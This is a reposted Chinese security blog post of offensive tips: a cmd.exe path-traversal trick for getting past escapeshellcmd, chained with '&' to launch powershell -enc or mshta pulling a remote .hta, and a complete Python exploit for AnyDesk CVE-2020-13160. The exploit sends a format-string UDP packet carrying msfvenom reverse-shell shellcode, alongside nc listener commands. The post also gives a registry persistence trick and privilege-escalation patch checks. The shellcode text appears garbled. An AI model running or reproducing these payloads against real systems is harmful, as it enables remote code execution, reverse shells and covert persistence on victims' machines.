CMD Hijack & AnyDesk RCE & other

admin
admin
admin
104377
文章
87
评论
2022年3月19日06:44:23评论226 views字数 2407阅读8分1秒阅读模式

From: https://hackingiscool.pl/

poc完整的命令行

cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe"

可能产生的影响

包括拒绝服务,信息泄露,任意代码执行(取决于目标应用程序和系统)。

以web应用为例

CMD Hijack & AnyDesk RCE & other

由于使用了escapeshellcmd(),不易受命令注入的影响,使用本方法

一个poc

CMD Hijack & AnyDesk RCE & other

CMD Hijack & AnyDesk RCE & other

不限于任何位置,文件

CMD Hijack & AnyDesk RCE & other

再扩展一下

如,powershell带-enc执行,或mshta等方法,可参考

https://lolbas-project.github.io/,但是依照windows的特性,在无法将完整字符串解析为有效路径的情况下,会拆分空格后面的内容,这里可以使用&符号

如:

>cmd.exe /c "cmd /c /../../../../../../../../../../windows/system32/calc&powershell -enc xxxx"

>cmd.exe /c "cmd /c /../../../../../../../../../../windows/system32/calc&mshta http://192.168.0.105:8080/xsuUEWJ.hta"

CMD Hijack & AnyDesk RCE & other

AnyDesk远程代码执行(CVE-2020-13160

https://devel0pment.de/?p=1881

生成shellcode

msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "x00x25x26" -f python -v shellcode

本地监听

nc -lvp 4444

EXP

#!/usr/bin/env python

import structimport socketimport sys

ip = '127.0.0.1'port = 50001

def gen_discover_packet(ad_id, os, hn, user, inf, func):  d  = chr(0x3e)+chr(0xd1)+chr(0x1)  d += struct.pack('>I', ad_id)  d += struct.pack('>I', 0)  d += chr(0x2)+chr(os)  d += struct.pack('>I', len(hn)) + hn  d += struct.pack('>I', len(user)) + user  d += struct.pack('>I', 0)  d += struct.pack('>I', len(inf)) + inf  d += chr(0)  d += struct.pack('>I', len(func)) + func  d += chr(0x2)+chr(0xc3)+chr(0x51)  return d



shellcode =  b""shellcode += b"x48x31xc9x48x81xe9xf6xffxffxffx48"shellcode += b"x8dx05xefxffxffxffx48xbbx59x88xc6"shellcode += b"x9cx5fxfex71x38x48x31x58x27x48x2d"shellcode += b"xf8xffxffxffxe2xf4x33xa1x9ex05x35"shellcode += b"xfcx2ex52x58xd6xc9x99x17x69x39x81"shellcode += b"x5bx88xd7xc0x20xfex71x39x08xc0x4f"shellcode += b"x7ax35xeex2bx52x73xd0xc9x99x35xfd"shellcode += b"x2fx70xa6x46xacxbdx07xf1x74x4dxaf"shellcode += b"xe2xfdxc4xc6xb6xcax17x3bxe1xa8xb3"shellcode += b"x2cx96x71x6bx11x01x21xcex08xb6xf8"shellcode += b"xdex56x8dxc6x9cx5fxfex71x38"

print('sending payload ...')p = gen_discover_packet(4919, 1, 'x85xfe%1$*1$x%18x%165$ln'+shellcode, 'x85xfe%18472249x%93$ln', 'ad', 'main')s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)s.sendto(p, (ip, port))s.close()print('reverse shell should connect within 5 seconds')

附一个维持权限的tip

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionAppCompatFlagsTelemetryControllerfun

创建Reg_SZ名"Command"值为恶意exe,DWORD名为Nightly值为1,每当启动计划任务时触发

附一个10W行的渗透测试tips

https://www.octority.com/pepenote/

CMD Hijack & AnyDesk RCE & other

附一个win提权补丁查询

https://patchchecker.com/checkprivs/

wmic qfe list full|findstr /i hotfix

CMD Hijack & AnyDesk RCE & other

CMD Hijack & AnyDesk RCE & other

CMD Hijack & AnyDesk RCE & other

以前查补丁是用

Windows-exploit-suggester

https://github.com/GDSSecurity/Windows-Exploit-Suggester

Wesng

https://github.com/bitsadmin/wesng

CMD Hijack & AnyDesk RCE & other



本文始发于微信公众号(关注安全技术):CMD Hijack & AnyDesk RCE & other

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月19日06:44:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CMD Hijack & AnyDesk RCE & otherhttp://cn-sec.com/archives/501376.html

发表评论

匿名网友 填写信息